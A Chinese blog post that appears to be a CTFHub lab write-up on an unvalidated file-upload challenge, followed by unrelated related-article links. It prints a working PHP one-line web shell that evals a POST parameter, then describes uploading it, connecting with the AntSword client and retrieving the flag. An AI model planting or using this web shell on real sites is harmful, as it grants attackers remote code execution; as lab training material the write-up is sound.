当前位置: 首页 > article >正文

CTFHUB技能树之文件上传——无验证

开启靶场,打开链接:


直接上传一句话木马:

<?php @eval($_POST['pass']);?>


成功提交并显示了上传的文件的路径


访问一下该文件触发一句话木马:

看到一片空白是正常的,因为没有写什么函数,比如:

<?php @eval($_POST['pass']);phpinfo();?>


蚁剑直接连接,查找flag文件:

成功得到flag:

ctfhub{f65a7c78ae34c3ff2ac4cf5c}


http://www.kler.cn/news/363826.html

相关文章:

  • uniapp微信小程序使用vant组件库
  • 鸿蒙网络编程系列28-服务端证书锁定防范中间人攻击示例
  • 谷歌新安装包文件形式 .aab 在UE4中的打包原理
  • 面向对象进阶(下)(JAVA笔记第二十二期)
  • 【Golang】Gin框架中如何定义路由
  • 【传知代码】智能推荐与隐私保护的融合(论文复现)
  • sql-labs靶场第十六关测试报告
  • 一款精美的导航引导页html源码
  • STM32 从0开始系统学习 1
  • 从0开始深度学习(20)——延后初始化和自定义层
  • Text实现美团部分样式
  • 代码随想录刷题学习日记
  • 基础知识 main函数形参 C语言
  • C++:模板的特化与分离编译
  • Python re 模块:正则表达式的强大工具
  • 全局滚动和局部滚动
  • 多模态大语言模型(MLLM)-Deepseek Janus
  • Spring AI 1.0.0 M1版本新特性!
  • 代码随想录算法训练营第二十二天|Day22 回溯算法
  • Oracle10g运维 表增删改查
  • 【Vue.js设计与实现】第三篇第11章:渲染器-快速 Diff 算法-阅读笔记
  • 文案创作新思路:Python与文心一言API的完美结合
  • 《计算机视觉》—— 基于dlib库的人脸关键部位的轮廓检测
  • 【MySQL】详解表的约束
  • 【途牛旅游网-注册/登录安全分析报告】
  • vue2.x中的数据劫持